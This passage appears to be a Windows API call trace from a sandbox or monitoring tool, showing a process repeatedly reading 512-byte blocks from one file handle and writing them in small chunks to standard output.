_get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, 
lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.068] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.068] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.068] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.068] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.069] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.069] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.069] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, 
lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] GetFileType (hFile=0x50) returned 0x1 [0131.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.070] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.070] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.070] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, 
lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] GetFileType (hFile=0x50) returned 0x1 [0131.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.071] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.071] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.071] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 
[0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] GetFileType (hFile=0x50) returned 0x1 [0131.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.072] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.072] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.072] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.072] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: 
lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] GetFileType (hFile=0x50) returned 0x1 [0131.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.073] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.073] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.073] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 
[0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f2cc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] GetFileType (hFile=0x50) returned 0x1 [0131.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.074] WriteFile (in: hFile=0x50, lpBuffer=0x12f31c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f31c*, lpNumberOfBytesWritten=0x12e320*=0x20, lpOverlapped=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.074] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e30c | out: lpNewFilePointer=0x0) returned 1 [0131.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0131.074] ReadFile (in: hFile=0x58, lpBuffer=0x12f13c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e32c, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesRead=0x12e32c*=0x200, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 
[0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f1dc*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] GetFileType (hFile=0x50) returned 0x1 [0131.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0131.075] WriteFile (in: hFile=0x50, lpBuffer=0x12f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e320, lpOverlapped=0x0 | out: lpBuffer=0x12f22c*, lpNumberOfBytesWritten=0x12e320*=0x50, lpOverlapped=0x0) returned 1 [0131.075] _get_osfhandle 